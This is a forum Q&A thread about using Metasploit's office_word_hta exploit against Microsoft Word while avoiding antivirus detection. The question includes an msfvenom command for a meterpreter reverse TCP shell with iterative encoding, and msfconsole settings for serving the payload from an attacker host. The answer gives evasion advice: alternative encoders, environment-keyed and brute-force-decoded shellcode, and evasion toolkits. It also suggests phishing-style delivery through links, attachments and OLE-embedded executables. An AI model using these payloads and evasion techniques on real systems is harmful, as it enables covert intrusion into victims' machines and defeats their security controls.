# Using office_word_hta

Tags: exploit, metasploit

I'm trying to exploit MS Word, avoiding AV detection. So, what do I have to do?

First, generating the payload, for example:

`msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe`

*1. What fileformat should be? exe?
If I set "-f exe", I still have to set name "payload.exe" istead of "payload"?*

*2. How to choose what encoders to use and what iterations to avoid detections of AV Kaspersky for example? Just try from one to another or what?*

Then I go to msfconsole

```
msf > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > set lhost srvhost 172.20.10.4
msf exploit(office_word_hta) > set srvhost 172.20.10.4
msf exploit(office_word_hta) > set payload generic/custom right?
then set payloadfile pointing to ~/payload.exe?
msf exploit(office_word_hta) > exploit
```

Am i doing right?)

Comment: You should be more to specific in your question - clean it up and ask one single and coherent question. Some tips: 1. Don't use numbering within the question unless it's a process you would like to define (in your case it is questions within some kind of steps, which is confusing to say the least), 2. be with one single question in mind and make it clear, not just ending with "Am I doing it right?"

Answer (score 0):

**ENCODING**

A few things you could do is change the encoder for the payload -- shikata_ga_nai is a well known encoding method that several AVs detect.

First, generate the raw, unencoded shellcode.

From there, use another toolkit (Veil 3.0/Veil-Evasion, empty-nest, Ebowla) that have a slew of encoding options.

You can also use context-based encoders, which rely on known information (e.g. the domain, username of current context, get creative):
https://labs.mwrinfosecurity.com/blog/safer-shellcode-implants/
https://github.com/Genetic-Malware/Ebowla

Another cheap way is to encode is to encrypt 'AAAA' with RC4 or another cryptographic algorithm (sha-256) several times and have the shellcode perform the same operation and brute-force it (using it as the key) to decode the staged payload:

http://www.irongeek.com/i.php?page=videos/derbycon7/t301-a-new-take-at-payload-generation-empty-nest-james-cook-tom-steele
https://github.com/empty-nest/emptynest

https://github.com/Genetic-Malware/Ebowla

**PAYLOAD**

Do your research! You *could* serve up the file as an attachment or send a benign/typo looking link and have the target pull the file from your server (encrypted with a valid SSL cert via letsencrypt or msf\impersonate_ssl).

There are a few bypasses out there, one is that you can embed an executable in a Microsoft office doc due to OLE:
https://doublepulsar.com/oleoutlook-bypass-almost-every-corporate-security-control-with-a-point-n-click-gui-37f4cbc107d0

Outside of that, you need to *really* know your target and try harder!